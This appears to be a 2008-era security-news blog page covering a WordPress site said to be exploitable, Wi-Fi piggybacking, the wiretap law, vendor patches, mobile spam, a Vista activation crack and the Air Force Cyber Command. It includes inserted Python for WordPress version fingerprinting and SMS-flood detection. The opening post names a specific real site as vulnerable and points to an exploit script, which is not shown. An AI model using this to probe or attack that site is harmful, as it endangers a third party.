2MT, 4nTr4xX, Aoen, Akuryou, ArcheKleine, AtroCty, Beary, BeastPete, Blaow, Burning-Legions, Calf85, Capnrawr, Cascaderro, chiwhisox, Clogon, Cornerstone, Damican, DarkCloud, DarkMist, DBX_5TM, Dimitrii, Disrup3, EastyMoryan, esby, Eldorquo, EnderX, Evil-Zergling, Exetasi, Exy, Fellower_of_Odin, Firewyrm, frlolg, FzeroXx, gorzerk, Grunthor, Guvoverthere07, HunterX2, IEatDeadPeoples, Infrisios, Jmesch04, Ki-HunterKiller, kugelkind, landonmullet, Loki57, LulaLula, Mago-Merlino, Malakal, McGrady, Minotaar, Moimucus, Nova, PharadoX, phssy_galore, ptdprac, PudgeIsAPirate, Quicksilva, Redial2, Rifleman00, Rigor_Mortis, Ro-Coco, Rubadub, Severas, sketch-e, Sledgehmr, Slopy, spielkind, sSerenity, StokesII, Tarano, Terrorblaze, Thermald, The_Intimidator, TimeToParty, tinfoiltank, Tinker, Tomahawk_Chop, Trozz_, Truxton, Tuwl, u-nL-ike, unHOLYdoNUTS, vigi-, Volcove, whifrA, Wretch, the_white_mage, Y0UR, Zagruss, Zarent, Zethal

happyslip.com site is vulnerable

The http://www.happyslip.com/ site is vulnerable because it is still running WordPress 2.2.1, and it can be exploited by using this script. I hope this blog will be updated soon....


Good luck, kabayan (countryman) happyslip, update your blog ASAP...
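The post gives no detail on how the WordPress version was determined. The check below is an added example, not the script the post refers to: it reads the `<meta name="generator">` tag that WordPress 2.x emits by default and compares the advertised version against a baseline. The HTML is constructed for the example, and the baseline of 2.3.3 is an assumption chosen for illustration, not a statement about which release was current when the post was written.

```python
"""Read a WordPress site's advertised version from its HTML and compare it
against a baseline. Added example; the sample page below is constructed."""
import re

META_RE = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)


def wordpress_version(html):
    """Return the version string from a WordPress generator meta tag, or None.
    Handles either attribute order (name first or content first)."""
    for tag in META_RE.findall(html):
        if not re.search(r'name\s*=\s*["\']generator["\']', tag, re.IGNORECASE):
            continue
        m = re.search(r"WordPress\s+(\d+(?:\.\d+)*)", tag)
        if m:
            return m.group(1)
    return None


def version_tuple(version):
    """'2.2.1' -> (2, 2, 1) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def is_outdated(html, baseline="2.3.3"):
    """True if the page advertises a WordPress version older than `baseline`,
    False if it is at or above it, None if no version is advertised at all
    (many hardened installs strip the generator tag, so None is not 'safe').
    The default baseline is an assumption for illustration only."""
    version = wordpress_version(html)
    if version is None:
        return None
    return version_tuple(version) < version_tuple(baseline)


# Constructed sample head, mimicking what a WordPress 2.2.1 install emits.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 2.2.1" />
<title>example blog</title></head><body></body></html>"""

if __name__ == "__main__":
    print(wordpress_version(SAMPLE_HTML), is_outdated(SAMPLE_HTML))
```

Removing the generator tag does not fix anything; the version also leaks through files such as readme.html and versioned script URLs, so the remedy is to update, not to hide the number.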

P2P clampdown to fuel Wi-Fi hijacking

UK government proposals to make ISPs take action against the estimated six million users who access pirated online material every year could prompt an explosion in Wi-Fi hijacking, experts warned today.

Security firm Sophos predicted that the moves outlined in a Green Paper could cause headaches for ISPs and Wi-Fi users, as users could claim that other people have been illegally piggybacking on their internet services.

A Sophos poll of 560 computer users in November revealed that 54 per cent have stolen Wi-Fi internet access in the past.

"Pressure is being put on ISPs to take action, but an open Wi-Fi hotspot may mean that it is you who ends up disconnected from the net while your next door neighbour is happily watching the Hollywood blockbuster they stole via your connection," said Graham Cluley, senior technology consultant at Sophos.

"People who illegally download material from the net are not going to have any qualms about stealing someone else's internet connection.

"The widespread scale of the problem not only means that there are likely to be innocent victims, but it gives those people who have been making illegal downloads a plausible defence."

The Green Paper, which is due to be published next week, outlines a 'three-strikes' initiative under which users making illegal downloads will first receive an email warning, then a suspension of their account, and finally termination of their contract.

"ISPs are finding themselves between a rock and a hard place. They are being leaned on by the movie and music industry to block pirate downloads, but don't want to alienate customers by accusing them of something they didn't do," Cluley added.

"There is no 100 per cent solution for blocking illegal downloads which does not also inconvenience the innocent."

US Senate Votes to Renew Wiretap Law

The U.S. Senate Tuesday voted to renew a controversial surveillance law set to expire at the end of the week. Lawmakers left intact a provision to shield telephone companies from lawsuits for their role in the Bush administration's wiretap program, despite opposition from many Democrats. VOA's Deborah Tate reports from Capitol Hill.

The Senate voted to extend a law which authorizes U.S. intelligence agencies to monitor - without warrants - telephone calls and emails between Americans and suspected terrorists overseas.

Passage came after senators voted down an amendment to deny legal immunity to telephone companies that participated in the administration's wiretapping program after the September 11, 2001 terrorist attacks on the United States. Senators also rejected two other amendments that would have weakened the immunity provision.

Some 40 lawsuits have been filed against phone companies for allegedly violating privacy rights.

The immunity provision survived the votes despite opposition from many Democrats, including Senator Russ Feingold of Wisconsin.

"Congress should not be giving automatic retroactive immunity to companies that allegedly cooperated with president's illegal NSA [National Security Agency] wiretapping program," said Senator Feingold. "This provision of the bill is both unnecessary and unjustified, and it will undermine the rule of law."

But President Bush, congressional Republicans and even some moderate Democrats say the immunity provision is necessary. They warn that if the lawsuits are heard in court, national security could be compromised.

Senator Christopher Bond of Missouri is the top Republican on the Senate Intelligence Committee.

"If we permit lawsuits to go ahead against carriers alleged to have participated in the program, there will be more disclosures in discovery and pleadings of the means of collecting information, disclosing our most vital methods of collecting information," said Senator Bond.

President Bush has vowed to veto any legislation that does not contain the immunity provision. Just hours before final passage, White House spokeswoman Dana Perino signaled the president could back the Senate bill.

"The legislation is shaping up to be one that the president can support," said Dana Perino.

The Senate measure must be reconciled with a House-passed version, which does not include the immunity provision.

The Senate action on the wiretap bill prompted the return to the chamber of two presidential candidates, Democratic Senator Barack Obama of Illinois and Republican Senator John McCain of Arizona. Obama voted against immunity for telephone companies, while McCain voted in favor of keeping the provision in the bill.

Senator Hillary Clinton of New York, the other Senate Democrat running for the White House, did not appear for the vote. Clinton, Obama, and McCain were in the Washington area for Tuesday's primaries in the nation's capital, Maryland and Virginia.

Microsoft patches severe IE browser flaws

Microsoft released 11 patches on Tuesday to fix vulnerabilities in its software, including three critical flaws in the company's flagship Web browser, Internet Explorer 7.

The three critical security holes in Internet Explorer include memory corruption issues in the browser's HTML rendering capabilities for certain layouts, the handling of a property method, and the browser's processing of arguments when processing images. Microsoft rated all three flaws Critical, its highest severity rating, for Internet Explorer 7 running on both Windows XP Service Pack 2 systems and Windows Vista systems. A fourth flaw fixed by the patch is rated Important on the most common versions of Windows.

"Today's Microsoft patches underline the need to be aware when opening files and the risk of surfing the Web unprotected," Craig Schmugar, a threat researcher at McAfee Avert Labs, said in a statement discussing the patches. "Many of the vulnerabilities addressed by the fixes could be exploited if a Windows user simply opens a file or visits a malicious or compromised Web site, favorite attack methods among cybercriminals."

Microsoft's other Critical-rated bulletins include four patches for security issues in Microsoft's Office productivity suite and a patch to close a serious security hole in a component of Microsoft Windows that handles Web Distributed Authoring and Versioning (WebDAV) file commands.

The updates, published by Microsoft on its regularly scheduled patch day, bring the total number of flaws fixed by the company to 20 for the year. In January, the company issued two bulletins to fix three flaws. Last year, the software giant released 69 bulletins. A report issued by IBM's Internet Security Systems found that fewer software vulnerabilities were disclosed in 2007 than in 2006, the first time that ISS's tally has declined.

Microsoft rated five of the patches "Important," its second highest severity rating, fixing issues in the file conversion feature of Microsoft Works and Microsoft Office as well as two vulnerabilities in Microsoft's Internet Information Services (IIS) Web server software, a flaw in Microsoft's Active Directory software, and a security issue in the way Windows handles TCP/IP packets.

Mobile subscribers showered with spam

Mobile operators are being warned to brace themselves for a global upsurge in mobile messaging abuse.

The growth of mobile messaging, reductions in message delivery costs, inherent network vulnerabilities, and new mobile marketing initiatives are converging to create a perfect storm for abuse, according to mobile security firm Cloudmark. It reports mobile spam is becoming a growing problem.

China and Southeast Asia are at the leading edge of the problem, partly due to low costs in sending and receiving text messages. In China, the average subscriber receives between six and 10 mobile spam messages per day.

Meanwhile, in India some operators face spam levels of about 30 per cent, even after protocol-level filtering. Levels of spam in Japan are likely to increase as operators open their networks to email-to-SMS and MMS services, Cloudmark warns.

Attackers are bringing techniques familiar from conventional email spam to the mobile medium. For example, spammers are impersonating other mobile phone numbers and networks to send out spam using SMS spoofing techniques. Unregistered pre-paid SIM cards are also being used to distribute mobile junk messages.

Mobile spam started out as an unscrupulous medium for material ranging from mortgage offers to pornographic messages. It is increasingly being used to scam prospective marks into calling premium rate numbers, texting premium rate short codes, or entering personal information into a phishing site. The increased prevalence of money making rackets has resulted in growing complaints to operators from customers who had previously ignored mobile spam.

As well as copping an earful of abuse over the problem, operators are also being left out of pocket. SMS faking and spoofing attacks from off-network sources cost operators hundreds of thousands of dollars each month in inter-carrier roaming and connection charges, according to Cloudmark.

It reports that government regulators across Asia are stepping in to mandate that mobile operators exercise greater control over mobile spam by making sure customers' complaints are acted upon and to insist on registration of pre-paid mobile SIMs.

Once upon a time in America

Over in the US, email to mobile attacks are dominant. Text messaging via the internet provides a cost-effective platform for miscreants to reach mobile subscribers. While numerically insignificant targets in the past, emails associated with mobile numbers are now showing up on the radar of spammers and phishers.

One in four messages sent to mobile devices via email in North America is spam, according to figures from Cloudmark's mobile operator clients in the region. Mobile spam can drive up resource utilisation and customer complaints. Adding insult to injury, victims of mobile spam in the US are often charged for receiving junk SMS messages, making them more likely to complain and ask for credits from their carrier.

To date, mobile spam attacks in the US have taken the form of unsolicited advertising. However it's probably only a matter of time before scammers get in on the act, as they've already done in Europe.

Safe European home

In Europe, mobile operators' "walled garden" strategies have limited the amount of third-party content from reaching mobile users. This, combined with the relatively high cost of sending SMS messages, has limited (but not eliminated) attacks.

Low-volume, high-value attacks involving phishing and premium rate phone numbers predominate in Europe. SMS flooding, denial-of-service attacks in which large volumes of SMS spam are sent within short time intervals, is also a problem in the region.
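The flooding pattern described above, one originator pushing many messages to many handsets in a short window, is the kind of thing an operator can spot in delivery logs before subscribers complain. The detector below is an added example, not code from Cloudmark or from the original article. The log format (ISO timestamp, `from=`, `to=`, `id=`) and the sample lines are constructed for this example; a real SMSC or CDR export would need its own parser, and the window and threshold are placeholders to be tuned against real traffic.

```python
"""Per-sender fan-out detector over constructed SMS delivery-log lines.
Flags any originator that reaches N distinct destinations inside a sliding
time window. Added example; log format and sample data are invented here."""
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log, in time order. Sender +15550100 bursts six messages
# to six different handsets within five seconds (the flooding pattern);
# sender +15550300 sends three messages a minute apart (ordinary use).
SAMPLE_LOG = """\
2008-02-13T10:00:00Z from=+15550100 to=+15550201 id=a1
2008-02-13T10:00:01Z from=+15550100 to=+15550202 id=a2
2008-02-13T10:00:02Z from=+15550100 to=+15550203 id=a3
2008-02-13T10:00:03Z from=+15550100 to=+15550204 id=a4
2008-02-13T10:00:04Z from=+15550100 to=+15550205 id=a5
2008-02-13T10:00:05Z from=+15550100 to=+15550206 id=a6
2008-02-13T10:00:30Z from=+15550300 to=+15550401 id=b1
2008-02-13T10:01:30Z from=+15550300 to=+15550402 id=b2
2008-02-13T10:02:30Z from=+15550300 to=+15550403 id=b3
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, sender, destination)."""
    ts_str, *fields = line.split()
    kv = dict(field.split("=", 1) for field in fields)
    return datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ"), kv["from"], kv["to"]


def detect_floods(log_text, window_seconds=60, threshold=5):
    """Return {sender: timestamp at which it first reached `threshold`
    distinct destinations within any `window_seconds` window}.
    Counting distinct destinations rather than raw message count avoids
    flagging a long two-party conversation. Assumes the log is time-sorted."""
    recent = defaultdict(deque)  # sender -> deque of (timestamp, destination)
    flagged = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, sender, dest = parse_line(line)
        window = recent[sender]
        window.append((ts, dest))
        # Evict entries older than the window relative to the newest message.
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        distinct_destinations = len({d for _, d in window})
        if distinct_destinations >= threshold and sender not in flagged:
            flagged[sender] = ts
    return flagged


if __name__ == "__main__":
    for sender, when in detect_floods(SAMPLE_LOG).items():
        print(f"flood suspected from {sender} at {when.isoformat()}Z")
```

Because the article notes that spammers spoof originating numbers, the `from=` field only identifies the claimed sender; this catches volume, not impersonation, and belongs alongside checks on which interconnect or SMSC the traffic actually entered from.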

Cloudmark reckons so-called vishing attacks that combine the use of VoIP networks with conventional email phishing scams will become a growing problem for mobile subscribers this year. It warns that mobile network abuse can tarnish an operator's brand and lead to increased support costs and customer churn as some customers react to being deluged by garbage by switching networks.

Worse still, mobile abuse may undermine operator attempts to introduce revenue-producing services.

"The growth in mobile messaging abuse is exposing operators to additional and unnecessary costs at a time when they are turning to messaging and mobile advertising to open up new revenue streams," said Jamie de Guerre, chief technology officer at Cloudmark.

"For mobile operators, the greatest risk is that subscribers' zero tolerance attitude towards intrusive mobile spam will prompt them to change providers or opt out of mobile advertising and marketing opportunities, leaving much needed new revenue streams fatally crippled from the outset."

Cloudmark, a provider in the emerging mobile security space, advises mobile operators to be proactive in protecting their subscribers rather than taking a wait-and-see approach to possible security problems.

Firefox 3 Beta 3 steps up its security game

Mozilla launched the third beta of its Firefox 3 browser Tuesday night with enhanced security features.

Firefox 3 Beta 3 contains more than 1,300 changes from the second beta to improve performance. Meanwhile, Mozilla improved some of the security features in Firefox 3 Beta 3. Among the notable items detailed in Mozilla’s release notes:

* Improved one-click site information: Mozilla says you can click on a site's favicon in the location bar to see who owns the site and whether the connection is secure. Identity verification is also easier to use.
* Malware protection: Firefox 3 Beta 3 includes malware protection that warns users when they get to sites that are known to deliver malicious payloads.
* Add-on updates: Firefox will disable add-ons that update in an "insecure manner." This feature could cut down on some of the flat file vulnerability issues of late.
* Vista parental controls: Firefox 3 now is compatible with Vista’s control settings to disable file downloads.
* Anti-virus integration: Firefox 3 will inform antivirus software when downloading executables.

And there are other features, but the big picture is this: Mozilla recognizes that browsers are often the weak security link. As a result Mozilla is building in more features to plug-and-play with existing security software. It may not be a stretch to predict that many security features in existing suites will be built into future browsers.

Apple releases security updates for Leopard, Tiger

Apple today released 11 security updates for Mac OS X, with many of the updates specific to the newly released Leopard operating system. Security Update 2008-001 is the first from Apple for 2008. The applications affected include Time Machine, Mail, and Parental Controls. The update can be downloaded and installed via Software Update preferences, or from Apple Downloads.

Directory Services
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses the vulnerability in CVE-2007-0355. Apple says, "A stack buffer overflow exists in the Service Location Protocol (SLP) daemon, which may allow a local user to execute arbitrary code with system privileges." Apple credits Kevin Finisterre of Netragard for reporting this vulnerability.

Foundation
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0035. An affected user accessing a maliciously crafted URL may experience an application termination or arbitrary code execution. A memory corruption issue exists in Safari's handling of URLs. By enticing a user to access a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. Apple notes that this issue does not affect systems prior to Mac OS X v10.5.

Launch Services
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0038. A removed application may still be launched via the Time Machine backup. Apple says, "Launch Services is an API to open applications or their document files or URLs in a way similar to the Finder or the Dock. Users expect that uninstalling an application from their system will prevent it from being launched. However, when an application has been uninstalled from the system, Launch Services may allow it to be launched if it is present in a Time Machine backup." Apple credits Steven Fisher of Discovery Software and Ian Coutier for reporting this vulnerability.

Mail
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses the vulnerability in CVE-2008-0039. Affected users accessing a URL in a message may experience arbitrary code execution. Apple says, "An implementation issue exists in Mail's handling of file:// URLs, which may allow arbitrary applications to be launched without warning when a user clicks a URL in a message. This issue does not affect systems running Mac OS X v10.5 or later."

NFS
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0040. A remote attacker may cause an unexpected system shutdown or arbitrary code execution if the system is being used as an NFS client or server. Apple says, "A memory corruption issue exists in NFS' handling of mbuf chains. If the system is being used as an NFS client or server, a malicious NFS server or client may be able to cause an unexpected system shutdown or arbitrary code execution." This issue does not affect systems prior to Mac OS X v10.5. Apple credits Oleg Drokin of Sun Microsystems for reporting this issue.

Open Directory
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11. No CVE number is given. An affected user may find that NTLM authentication requests always fail. Apple says, "This update addresses a non-security issue introduced in Mac OS X v10.4.11. A race condition in Open Directory's Active Directory plug-in may terminate the operation of winbindd, causing NTLM authentications to fail. This issue only affects Mac OS X v10.4.11 systems configured for use with Active Directory."

Parental Controls
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0041. Affected users may find that requesting to unblock a Web site leads to information disclosure. Apple says, "When set to manage Web content, Parental Controls will inadvertently contact www.apple.com when a Web site is unblocked. This allows a remote user to detect the machines running Parental Controls." Apple credits Jesse Pearson for reporting this issue.

Samba
This patch affects users of Mac OS X v10.4.11, v10.5, and v10.5.1 and Mac OS X Server v10.4.11, v10.5, and v10.5.1. The patch addresses the vulnerability in CVE-2007-6015. A remote attacker may cause an unexpected application termination or arbitrary code execution. Apple says, "A stack buffer overflow may occur in Samba when processing certain NetBIOS Name Service requests. If a system is explicitly configured to allow 'domain logons,' an unexpected application termination or arbitrary code execution could occur when processing a request. Mac OS X Server systems configured as domain controllers are also affected." Apple credits Alin Rad Pop of Secunia Research for reporting this issue.

Terminal
This patch affects users of Mac OS X v10.4.11, v10.5, and v10.5.1 and Mac OS X Server v10.4.11, v10.5, and v10.5.1. The update addresses the vulnerability in CVE-2008-0042. Affected users viewing a maliciously crafted Web page may experience arbitrary code execution. Apple says, "An input validation issue exists in the processing of URL schemes handled by Terminal.app. By enticing a user to visit a maliciously crafted Web page, an attacker may cause an application to be launched with controlled command line arguments, which may lead to arbitrary code execution." Apple credits Olli Leppanen of Digital Film Finland and Brian Mastenbrook for reporting this issue.

X11
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2007-4568. Apple says, "Multiple vulnerabilities in X11 X Font Server (XFS), the most serious of which may lead to arbitrary code execution."

X11
This patch affects users of Mac OS X v10.5 and v10.5.1 and Mac OS X Server v10.5 and v10.5.1. The update addresses the vulnerability in CVE-2008-0037. An affected user may find that changing the settings in the Security Preferences Panel has no effect. Apple says, "The X11 server is not reading correctly its 'Allow connections from network client' preference, which can cause the X11 server to allow connections from network clients, even when the preference is turned off." This issue does not affect systems prior to Mac OS X v10.5.

Father of anti-virus says to invest in security awareness training

I don't want to start a debate here over who invented anti-virus. According to DarkReading it is Peter Tippett. (See the recent debate over who invented the firewall here. Is Dark Reading also going to knight the inventor of malware if they can track him down?)

In a speech last week Tippett made some great points. Here is my favorite:

For example, today’s security industry focuses way too much time on vulnerability research, testing, and patching, Tippett suggested. “Only 3 percent of the vulnerabilities that are discovered are ever exploited,” he said. “Yet there is huge amount of attention given to vulnerability disclosure, patch management, and so forth.”

But Tippett has his own problems in understanding the state of IT security. He also states:

Security awareness programs also offer a high rate of return, Tippett said. “Employee training sometimes gets a bad rap because it doesn’t alter the behavior of every employee who takes it,” he said. “But if I can reduce the number of security incidents by 30 percent through a $10,000 security awareness program, doesn’t that make more sense than spending $1 million on an antivirus upgrade that only reduces incidents by 2 percent?”

That's a lot of "ifs" there, Peter. I would rather spend $100K on an authentication program that does not require user defined passwords than $10,000 every year forever trying to get my users to stop using "Pistons", "Patriots", or "Redwings" as their passwords.

Security awareness training for end users is a complete waste of time and money. Save your money for real security solutions that solve real deficiencies in your defenses.

Windows Vista SP1 activation is still crackable

A JOURNALIST at ZDnet has discovered that Microsoft's Windows Vista with Service Pack 1 (SP1) applied still has crackable Windows Genuine Advantage (WGA) activation.

Over the weekend, Adrian Kingsley-Hughes posted up the following blog entry:

"It does seem that Microsoft hasn’t been successful in closing off all the hacks that allow non-genuine copies of Vista SP1 to pass off as genuine ones. After a few minutes of searching the darker corners of the Internet and a few seconds in the Command Prompt I was able to fool Windows into thinking that it was genuine, turning this:

[image of Windows Vista status -- License Status: Notification]

"... into this:

[image of Windows Vista status -- License Status: Licensed]

"Close, but no cigar."

Indeed. Kingsley-Hughes also wrote that the "hack" (sic) is not complicated, but just a matter of "download, run, wait a few seconds, reboot, done," in his words.

So much for the quality of code demonstrated in the Vole's Windows Vista SP1.

Posted in | 0 comments

US charges six suspects over 9/11

The Pentagon has announced charges against six Guantanamo Bay prisoners over their alleged involvement in the 11 September 2001 attacks in the US.

Prosecutors will seek the death penalty for the six, who include alleged plot mastermind Khalid Sheikh Mohammed.

The charges, the first for Guantanamo inmates directly related to 9/11, are expected to be heard by a controversial military tribunal system.

About 3,000 people died in the hijacked plane attacks.

The Guantanamo Bay detention centre, in south-east Cuba, began to receive US military prisoners in January 2002. Hundreds have been released without charge but about 275 remain and the US hopes to try about 80.

Tribunal process

Brig Gen Thomas Hartmann, a legal adviser to the head of the Pentagon's Office of Military Commissions, said the charges alleged a "long-term, highly sophisticated plan by al-Qaeda to attack the US".

He said there would be "no secret trials" and that they would be "as completely open as possible".

"Relatively little amounts of evidence will be classified," Gen Hartmann said.

The other five defendants are Ramzi Binalshibh, a Yemeni, Walid Bin Attash, also from Yemen, Ali Abd al-Aziz Ali, who was born in Balochistan, Pakistan, and raised in Kuwait, Mustafa Ahmad al-Hawsawi, a Saudi, and Mohammed al-Qahtani.

Gen Hartmann said the charges included conspiracy, murder in violation of the laws of war, attacking civilians, destruction of property and terrorism.

All but Mr Qahtani and Mr Hawsawi are also charged with hijacking or hazarding an aircraft.

The charges listed "169 overt acts allegedly committed by the defendants in furtherance of the September 11 events".

Gen Hartmann said: "The accused will have his opportunity to have his day in court.

"It's our obligation to move the process forward, to give these people their rights."

He said they would be given military and civilian defence lawyers and would have the right of appeal.

In listing more details of the charges against the defendants, Gen Hartmann alleged that Khalid Sheikh Mohammed had proposed the attacks to al-Qaeda leader Osama Bin Laden in 1996, had obtained funding and overseen the operation and the training of hijackers in Afghanistan and Pakistan.

Khalid Sheikh Mohammed, a Kuwaiti of Pakistani extraction, was said to have been al-Qaeda's third in command when he was captured in Pakistan in March 2003.

He has reportedly admitted to decapitating kidnapped US journalist Daniel Pearl in 2002 but these charges do not relate to that.

The BBC's Vincent Dowd in Washington says Khalid Sheikh Mohammed has said he planned every part of the 9/11 attacks but that his confession may prove problematic as the CIA admitted using controversial "waterboarding" techniques.

Human rights groups regard the procedure as torture.

US Homeland Security Secretary Michael Chertoff told the BBC the trials would be fair.

Asked if evidence obtained from waterboarding - a controversial interrogation technique that simulates drowning - would be used, he said: "The judges will decide what's reasonably admissible and what's not admissible."

Legal challenge

The charges will now be sent to Susan Crawford, the convening authority for the military commissions, to determine whether they will be referred to trial.

Any trials would be held by military tribunal under the terms of the Military Commissions Act, passed by the US Congress in 2006.

The Act set up tribunals to try terror suspects who were not US citizens.

The law is being challenged by two prisoners at Guantanamo Bay, who say they are being deprived of their rights to have their cases heard by a US civilian court.

Responding to the new charges, a representative of Mohammed al-Qahtani said they would create "show trials".

Centre for Constitutional Rights in New York executive director Vincent Warren said: "These trials will be using evidence obtained by torture as a means to convict someone and execute them and that is absolutely abhorrent to what we believe in here in America.''

Nineteen men hijacked four planes in the 9/11 attacks. Two planes hit the World Trade Center in New York, another the Pentagon in Washington and the fourth crashed in Pennsylvania.

Posted in | 0 comments

Welcome to Cyberwar Country, USA

BARKSDALE AIR FORCE BASE, Louisiana -- When a reporter enters the Air Force office of William Lord, a smile comes quickly to the two-star general's face as he darts from behind his immaculate desk to shake hands. Then, as an afterthought, he steps back and shuts his laptop as though holstering a sidearm.

Lord, boyish and enthusiastic, is a new kind of Air Force warrior -- the provisional chief of the service's first new major command since the early 1990s, the Cyber Command. With thousands of posts and enough bandwidth to choke a horse, the Cyber Command is dedicated to the proposition that the next war will be fought in the electromagnetic spectrum, and that computers are military weapons. In a windowless building across the base, Lord's cyber warriors are already perched 24 hours a day before banks of monitors, scanning Air Force networks for signs of hostile incursion.

"We have to change the way we think about warriors of the future," Lord enthuses, raising his jaw while a B-52 traces the sky outside his windows. "So if they can't run three miles with a pack on their backs but they can shut down a SCADA system, we need to have a culture where they fit in."

But before Lord and his geek warriors can settle in for the wars of the future, the general has to survive a battle of a decidedly different nature: a political and cultural tug of war over where the Cyber Command will set up its permanent headquarters. And that, for Lord and the Air Force, is where things get trickier than a Chinese Trojan horse.

With billions of dollars in contracts and millions in local spending on the line, 15 military towns from Hampton, Virginia, to Yuba City, California, are vying to win the Cyber Command, throwing in offers of land, academic and research tie-ins, and, in one case, an $11 million building with a moat. At a time when Cold War-era commands laden with aging aircraft are shriveling, the nascent Cyber Command is universally seen as a future-proof bet for expansion, in an era etched with portents of cyberwar.

Russian Hackers and Chinese Cyberspies

The news is everywhere. When Russian hackers were blamed for a wave of denial-of-service attacks against Estonian websites last spring, President Bush voiced concern that the United States would face the same risk. The national intelligence director, Michael McConnell, recently claimed a computer attack against a single U.S. bank could cause more economic harm than 9/11, and called for more National Security Agency surveillance of the internet. A CIA official followed up with a tale about cyber attackers causing multi-city power failures overseas. Some in the military believe Chinese cyberspies have already penetrated unclassified Pentagon computers.

Where buzz flows, money follows, and the investment in info-war comes as the Air Force cuts back personnel elsewhere to fund new aircraft: The service just finished phasing out 20,000 enlisted men and women, with plans to dump 20,000 more by 2011. The effect of military cutbacks on the surrounding communities can be devastating. "If you gain or lose a unit in a place where the military is already a major employer, it has a huge impact," says Chris Erickson, a New Mexico State University professor.

Unofficial estimates say 10,000 military and ancillary jobs could clump around the 500 posts at the Cyber Command's permanent headquarters. The governors of California, New Mexico and Louisiana are pitching their locales directly to the secretary of the Air Force. In December, Louisiana governor Bobby Jindal took advantage of a meeting with President Bush on Katrina recovery to lobby for the Cyber Command. A dozen congressional delegations have weighed in as well. Lord is feeling the heat.

"Oh Lord," the general sighs, "there's congressional pressure."

Location, Location, Location

"It would sure be nice to have it here," says Tammy Frank, manager of the Waffle House in Bossier, Louisiana, outside Barksdale's gates. She pushes her hair behind her ears and leans on the cash register. "My (preteen) son is into computers, and it will be easier for him to find a good job and stay here."

The Cyber Command was provisionally established on Barksdale's 22,000 acres in October, at the edge of a black lake stitched with swamp trees that narrow just above the water line. The placement was good news for Bossier, which took it as a sign that Louisiana would win the permanent command, too.

A military town for generations, this sprawling suburb-opolis has about 58,000 residents, including 7,000 active-duty and reserve personnel. Across the Red River in Shreveport, downtown buildings are crumbling and half-abandoned -- but Bossier is thriving. Now realtors are touting proximity to the Cyber Command as a selling point for houses, while local residents hope permanent placement will boost the local economy, and perhaps even infuse the town with high-tech esprit.

To persuade the Air Force of Bossier's potential as a Deep South Silicon Valley, city officials broke ground last month on a "Cyber Innovation Center," a $100 million office complex abutting Barksdale. The consortium paid $4.7 million for a 64-acre parcel, and they've raised $50 million from state and local government and another $50 million from the federal government for a complex of buildings, starting with an $11 million, 120,000-square-foot cyberfortress. Renderings show a moat and huge, silvery wedges of metal jutting outward from the building's base. There's a jet in the design, pointed toward the sky.

Built-In Force Protection

"The building has force protection designed into it," says Craig Spohn, who's heading the development. "It can withstand a multitude of attacks."

Spohn ambles with a limp across a newly cleared patch of an old pecan grove that will house the gleaming redoubt. The trees remaining on the land are leafless in the bright winter haze, and a B-52 floats through the sky beyond, headed for the strip at Barksdale. The sight of the 47-year-old planes coming and going is so common here that only out-of-town visitors and aviation enthusiasts still stare at them.

Spohn follows it with his eyes. A lanky, gray-haired man in a nice suit, Spohn came back to work directly from arthroscopic knee surgery, and shows off fresh stitches in three holes on his left knee. He has personal reasons for wanting to win the Cyber Command. "My dad is retired Air Force," he says. "I moved wet and warm to Barksdale, and I love it here. There were no jobs for me when I left. And I eventually returned with a job working for SAIC.

"There are a lot of us who want to come back," he adds.

"Tell the Nation That the Age of Cyberwarfare Is Here"

The Cyber Command is rooted in a historic vision statement penned in 2005 by the secretary of the Air Force, Michael Wynne, and co-signed by the Air Force chief of staff. In the 21st century, Wynne wrote, America's enemies would contest America in a new range of theaters, and the armed forces must be ready to meet them and, if necessary, "destroy them" there. Henceforth, he vowed, the Air Force would "fly and fight in air, space and cyberspace."

"Tell the nation," Wynne reiterated in a speech last September, "that the age of cyberwarfare is here."

"Our mission is to control cyberspace both for attacks and defense," says Lord's boss, Lt. Gen. Robert Elder -- a three-star general who totes a Blackberry and holds a Ph.D. in electrical engineering. Wearing a green flight suit with no brass, bars or Bronze Star in sight, Elder relaxes in a leather chair away from his desk, and lays out the vision, which amounts to nothing less than a complete transformation of the Air Force.

"We have to learn to plan years out for operations, security defense and integration, to plan how to deter attacks, how to posture to prevent attacks, and we have to stay very current," Elder says.

The new command, only the 10th in Air Force history, means a single leadership for a number of pieces already in place under different wings. Cyber warriors are already being trained at Hurlburt Air Force Base in Florida, while Lackland Air Force Base in San Antonio holds the defense portion. Predator reconnaissance UAVs are flown out of Nevada, and Offutt Air Force Base in Nebraska has a cluster of information and intelligence wings.

No one knows how many people will ultimately be incorporated into the Cyber Command. The Air Force's other nine commands range in size from slightly over 14,000 personnel in the Special Ops Command to 167,000 in the Air Combat Command. A recent Network World article, quoting Elder, reports the Cyber Command will have 5,000 to 10,000 people. But the Air Force now disavows that number, confirming only that about 500 airmen and airwomen will be stationed at the Cyber Command headquarters itself.

Unified Command, Single Commander

The important thing, the Air Force says, is that under a unified command, decisions about how to use all the pieces -- and control of the budget, more than $2 billion the first year -- will be in the hands of a single commander instead of being spread out as they are now.

